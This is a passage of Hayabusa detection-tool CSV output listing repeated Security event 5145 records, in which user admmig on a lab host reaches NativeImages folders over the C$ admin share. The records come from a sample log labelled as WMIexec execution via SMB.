+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 